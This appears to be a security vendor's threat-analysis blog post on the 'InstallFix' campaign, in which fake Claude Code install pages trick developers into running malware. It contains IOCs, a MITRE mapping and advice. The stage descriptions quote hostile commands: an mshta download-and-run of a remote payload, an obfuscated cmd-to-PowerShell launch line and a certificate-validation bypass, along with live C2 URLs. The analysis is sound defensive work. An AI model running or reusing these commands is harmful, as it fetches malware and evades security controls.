{"id":24620,"date":"2026-06-30T08:30:14","date_gmt":"2026-06-30T01:30:14","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=24620"},"modified":"2026-07-14T09:55:52","modified_gmt":"2026-07-14T02:55:52","slug":"are-you-installing-an-ai-tool-or-opening-the-door-for-a-hacker-yourself","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/are-you-installing-an-ai-tool-or-opening-the-door-for-a-hacker-yourself\/","title":{"rendered":"Are you installing an AI tool&#8230; or opening the door for a hacker yourself?"},"content":{"rendered":"<h2 id=\"summary-of-the-campaign\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Summary of the campaign<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">InstallFix is a malware\/social engineering campaign discovered in early 2026, targeting developers and AI engineers by impersonating the installer of Claude Code\u2014a popular AI coding tool. Unlike traditional phishing campaigns that use emails or malicious attachments, InstallFix leverages Google Ads, SEO poisoning, fake installer websites, and one-line terminal commands to trick victims into executing malware on their own machines. The campaign is considered dangerous due to its high success rate, requiring almost no technical exploits, and specifically targeting high-privilege users (developers\/devops).<\/span><\/p>\n<h2 id=\"why-are-ai-tools-becoming-an-attractive-target-for-attackers\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Why are AI tools becoming an attractive target for attackers?<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The explosion of AI tools like Claude Code, Cursor, and AI agents has created a massive user base, especially among developers and AI engineers. Attackers only need SEO poisoning or fake Google Ads to reach many victims through keywords like &#8220;AI install&#8221; or &#8220;Claude Code setup.&#8221;<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The danger lies in the fact that a developer&#8217;s machine often contains valuable credentials like GitHub tokens, AWS keys, SSH keys, Kubernetes configs, and browser sessions. Just one compromised machine can lead to source code theft, cloud compromise, or a supply-chain attack. Additionally, many AI tools are often installed using sudo, Administrator shell, or elevated PowerShell. This allows malware to easily create persistence, bypass security controls, and execute payloads deeper within the system if the user accidentally runs a malicious command.<\/span><\/p>\n<h2 id=\"event-timeline\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Event timeline<\/span><\/h2>\n<table>\n<thead>\n<tr>\n<th><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Event timeline<\/span><\/th>\n<th><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Event timeline<\/span><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Q1 2026<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The attacker set up a fake website impersonating Claude Code and purchased Google Ads to push malicious search results to the top.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">A user searches for &#8220;Claude Code install&#8221; and mistakenly visits the fake website.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0 + a few minutes<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The victim copies and pastes the malicious installation command into the terminal\/PowerShell.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0 + 1 minute<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Payload stage-1 is executed, downloading additional malware through PowerShell or mshta.exe.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0 + 5 minutes<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Malware establishes persistence and begins stealing GitHub tokens, SSH keys, browser cookies, and cloud credentials.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0 + 10 minutes<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The device connects to the C2 server to receive additional payloads and control commands.<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T0 + a few hours<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Researcher discovers the fake infrastructure and unusual malware behavior.<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"initial-infection\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Initial infection<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The InstallFix campaign is primarily spread through Google Ads by exploiting sponsored search results. When users search for keywords like &#8220;Claude Code&#8221; or &#8220;Claude Code install,&#8221; the fake website appears at the top of Google Search, leading many victims to believe it is the official site.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/11-1779426323.png\"><img decoding=\"async\" class=\"size-full wp-image-24622 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/11-1779426323.png\" alt=\"11 1779426323\" width=\"1014\" height=\"460\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/11-1779426323.png 1014w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/11-1779426323-700x318.png 700w\" sizes=\"(max-width: 1014px) 100vw, 1014px\" \/><\/a><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/22-1779426336.png\"><img decoding=\"async\" class=\"size-full wp-image-24623 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/22-1779426336.png\" alt=\"22 1779426336\" width=\"1840\" height=\"749\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/22-1779426336.png 1840w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/22-1779426336-700x285.png 700w\" sizes=\"(max-width: 1840px) 100vw, 1840px\" \/><\/a><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This fake site is intricately designed, closely mimicking the entire interface and installation workflow of the real website. The most dangerous aspect is the install command displayed on the page. Instead of a valid installation command, the attacker replaced it with a malicious command using PowerShell and mshta.exe to download and execute malware on Windows systems. For macOS users, the website also displays similar malicious commands to deploy payloads on Apple devices.<\/span><\/p>\n<p><span style=\"font-size: 12pt\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/33-1779426348.png\"><img decoding=\"async\" class=\"size-full wp-image-24624 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/33-1779426348.png\" alt=\"33 1779426348\" width=\"1692\" height=\"829\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/33-1779426348.png 1692w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/33-1779426348-700x343.png 700w\" sizes=\"(max-width: 1692px) 100vw, 1692px\" \/><\/a><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Additionally, the malicious ad URL is designed to resemble a legitimate Google Ads link. Parameters like gar_source and gad_campaign are added to mimic the typical tracking structure seen in Google ad campaigns, increasing credibility and reducing the likelihood of user suspicion.<\/span><\/p>\n<p><span style=\"font-size: 12pt\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/44-1779426362.png\"><img decoding=\"async\" class=\"size-full wp-image-24625 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/44-1779426362.png\" alt=\"44 1779426362\" width=\"1466\" height=\"673\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/44-1779426362.png 1466w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/44-1779426362-700x321.png 700w\" sizes=\"(max-width: 1466px) 100vw, 1466px\" \/><\/a><\/span><\/p>\n<h2 id=\"attack-chain\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Attack chain<\/span><\/h2>\n<p><span style=\"font-size: 12pt\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/55-1779426380.png\"><img decoding=\"async\" class=\"size-full wp-image-24626 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/55-1779426380.png\" alt=\"55 1779426380\" width=\"1001\" height=\"688\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/55-1779426380.png 1001w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/55-1779426380-700x481.png 700w\" sizes=\"(max-width: 1001px) 100vw, 1001px\" \/><\/a><\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Stage 1 \u2014 Initial Access via Google Ads Malvertising<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The InstallFix campaign begins with the attacker purchasing Google Ads to secure the top position in search results for keywords like &#8220;Claude Code&#8221; or &#8220;Claude Code install.&#8221; When users search for this AI tool, the sponsored result leads to a fake website that closely resembles the official Claude Code installation page. The fake website is intricately designed with installation instructions tailored for each operating system, such as Windows and macOS. Instead of providing a legitimate installation file, the site displays a malicious command and instructs users to copy-paste it into the terminal or PowerShell to &#8220;complete the installation.&#8221;<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This is a variant of the ClickFix social engineering technique\u2014attackers do not exploit technical vulnerabilities but instead trick victims into executing the payload on their own machines. On Windows, this command will activate mshta.exe to download the payload from a remote server.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Stage 2 \u2014 MSHTA Downloads and Executes Polyglot ZIP\/HTA File<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">After the user runs the command from the fake website, the PowerShell process will call: mshta.exe\u00a0<a href=\"https:\/\/download-version.1-5-8%5C[.%5C]com\/claude.msixbundle\" target=\"_blank\" rel=\"noopener ugc nofollow\">https:\/\/download-version.1-5-8com\/claude.msixbundle<\/a>, and the payload downloaded is claude.msixbundle.<\/span><\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/Screenshot-2026-05-22-115704-1779426412.png\"><img decoding=\"async\" class=\"size-full wp-image-24627 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/Screenshot-2026-05-22-115704-1779426412.png\" alt=\"Screenshot 2026 05 22 115704 1779426412\" width=\"1006\" height=\"446\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/Screenshot-2026-05-22-115704-1779426412.png 1006w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/Screenshot-2026-05-22-115704-1779426412-700x310.png 700w\" sizes=\"(max-width: 1006px) 100vw, 1006px\" \/><\/a><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">On the surface, this appears to be a legitimate Microsoft installation package; however, in reality, this file is a ZIP\/HTA polyglot\u2014meaning it simultaneously contains a valid ZIP archive and a malicious HTA payload appended at the end of the file.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The beginning of the file contains Microsoft Bing packages with valid digital signatures from the Microsoft Marketplace to enhance credibility if inspected superficially. However, mshta.exe will skip the ZIP part and directly read the embedded HTA section at the end of the file to execute the malicious code.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This polyglot technique helps attackers:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Bypass simple checks<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Make the file appear legitimate<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Evade certain detection mechanisms based on extension or magic bytes<\/span><\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/77-1779426429.png\"><img decoding=\"async\" class=\"size-full wp-image-24628 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/77-1779426429.png\" alt=\"77 1779426429\" width=\"795\" height=\"150\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/77-1779426429.png 795w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/77-1779426429-700x132.png 700w\" sizes=\"(max-width: 795px) 100vw, 795px\" \/><\/a><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Stage 3 \u2014 HTA VBScript Executes Silently via COM<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">After mshta.exe runs the payload, the HTA will activate the VBScript completely hidden from the user. The script uses: Shell.Application through the COM object: GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4 to launch the next payload.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">To evade detection, the attacker uses multiple layers of obfuscation:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Hex encoding<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Base64 encoding<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Split string reconstruction<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The two main functions used are:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">DisplayEmailGnu() to decode the hex string<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">GetBiosDebian() to decode the Base64 command<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">After decoding is complete, the VBScript will execute the command: cmd.exe \/v:on \/c &#8220;set x=pow&amp;&amp;set y=ershell&amp;&amp;call %windir%\\SysWOW64\\WindowsPowerShell\\v1.0!x!!y! -E &#8221; to invoke Windows PowerShell from cmd.exe for the next stage of the attack chain.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Stage 4 \u2014 PowerShell Stager and AMSI Bypass<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">After the command is reconstructed, the malware calls the 32-bit PowerShell version in: SysWOW64\\WindowsPowerShell\\v1.0\\ and executes the Base64 payload using the parameter: -E. This PowerShell stager performs several critical steps:<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Victim Profiling<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Here, the malware creates a unique ID for each victim by hashing: COMPUTERNAME + USERNAME, using MD5, then taking the first 16 characters as the victim token.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This allows the attacker to:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">track each victim individually<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">create a unique C2 URL for each machine<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">make it difficult to block at the network level<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>SSL Validation Bypass<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Malware disables certificate validation: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} to accept any HTTPS certificate, including self-signed or malicious certs.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>AMSI Bypass<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">One of the most dangerous techniques is patching AMSI (Antimalware Scan Interface). Payload:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">RC4 decrypts obfuscation strings<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">using a key<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Result:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">PowerShell session is almost &#8220;blind&#8221; to AMSI<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">AV\/EDR struggles to scan subsequent payloads<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Fileless Payload Execution<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Sau khi bypass AMSI th\u00e0nh c\u00f4ng, malware t\u1ea3i giai \u0111o\u1ea1n cu\u1ed1i t\u1eeb C2: https:\/\/[victim-id].oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1.<\/span><\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/88-1779426442.png\"><img decoding=\"async\" class=\"size-full wp-image-24629 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/88-1779426442.png\" alt=\"88 1779426442\" width=\"1780\" height=\"827\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/88-1779426442.png 1780w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/88-1779426442-700x325.png 700w\" sizes=\"(max-width: 1780px) 100vw, 1780px\" \/><\/a><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The payload is executed directly in memory using IEX without writing a file to disk. This is a very common fileless execution technique in modern malware to:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Evade antivirus<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Reduce forensic artifacts<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">More difficult to analyze<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Stage 5 \u2014 Final Payload<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The final payload has not been fully recovered because Trend Micro Apex One terminated the process chain before IEX completed.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">However, telemetry indicates that the malware attempted to load the payload from: https:\/\/[victim-id].oakenfjrod[.]ru\/<\/span><\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/99-1779426460.png\"><img decoding=\"async\" class=\"size-full wp-image-24630 alignnone\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/99-1779426460.png\" alt=\"99 1779426460\" width=\"1746\" height=\"977\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/99-1779426460.png 1746w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2026\/05\/99-1779426460-700x392.png 700w\" sizes=\"(max-width: 1746px) 100vw, 1746px\" \/><\/a><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Since the payload was executed filelessly and blocked early, the final function has not been fully identified. However, based on observed TTPs and behavior, it is likely to be:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Infostealer<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">remote access payload<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">credential harvester<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">secondary loader for other malware.<\/span><\/li>\n<\/ul>\n<h2 id=\"installfix-is-the-evolution-of-clickfix\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">InstallFix is the evolution of ClickFix.<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Many researchers consider InstallFix to be the new version of the technique: ClickFix.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The difference lies in:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">ClickFix tricks users into clicking<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">InstallFix tricks users into running a command themselves<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The &#8220;do-it-yourself&#8221; mentality makes:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">victims less suspicious<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">many security policies naturally bypassed<\/span><\/li>\n<\/ul>\n<h2 id=\"ioc\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">IOC<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Domains<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">download-version[.]1-5-8[.]com<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">hosted-by[.]yeezyhost[.]net<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">oakenfjrod[.]ru<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>URL<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">hxxps:\/\/download-version[.]1-5-8[.]com\/claude[.]msixbundle<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">hxxps:\/\/&lt;victim_md5&gt;.oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>IP<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">185[.]177[.]239[.]255<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">77[.]91[.]97[.]244<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">104[.]21[.]0[.]95<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Hashes<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">2b99ade9224add2ce86eb836dcf70040315f6dc95e772ea98f24a30cdf4fdb97<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74<\/span><\/li>\n<\/ul>\n<h2 id=\"mitre-attampck-mapping\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">MITRE ATT&amp;CK Mapping<\/span><\/h2>\n<table>\n<thead>\n<tr>\n<th><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Tactic<\/span><\/th>\n<th><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Technique<\/span><\/th>\n<th><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Description<\/span><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Initial Access<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1566<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Phishing<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Execution<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1059.001<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">PowerShell<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Defense Evasion<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1218<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Signed Binary Proxy Execution<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Persistence<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1547<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Startup Persistence<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Credential Access<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1555<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Browser Credentials<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Discovery<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1082<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">System Information Discovery<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Command &amp; Control<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1071.001<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Web Protocols<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Exfiltration<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">T1041<\/span><\/td>\n<td><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Exfiltration Over C2<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"expert-assessment\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Expert assessment<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">InstallFix shows that attackers no longer rely entirely on exploit techniques but instead exploit user behavior directly. Instead of distributing malware through traditional phishing emails, this campaign takes advantage of developers&#8217; habit of copy-pasting installation commands to gain initial access. Notably, the targets are not regular users but developers and AI engineers\u2014individuals who often possess GitHub tokens, SSH keys, cloud credentials, and access to critical infrastructure. This means a minor compromise can easily escalate into a large-scale supply chain attack.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The campaign also reflects a new trend as the AI ecosystem increasingly becomes an attractive attack surface for cybercriminals. With the popularity of AI coding tools, fake installer, package, or extension campaigns are likely to increase in the future. For businesses in Vietnam, the risk is particularly high in tech companies, outsourcing, fintech, and AI startups\u2014where developers often use local admin workstations and cloud credentials on personal devices. InstallFix is a clear warning that securing AI tools is now a mandatory requirement, no longer optional.<\/span><\/p>\n<h2 id=\"recommendation\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Recommendation<\/span><\/h2>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Do not install software from Google Ads.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Many victims are deceived by clicking on &#8220;Sponsored&#8221; results on Google Search. Attackers just need to purchase ads and clone the official website interface to trick users.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Instead of searching randomly:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">bookmark the official website<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">access directly from the vendor<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">carefully verify the domain before downloading<\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Avoid using curl | bash as much as possible<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, 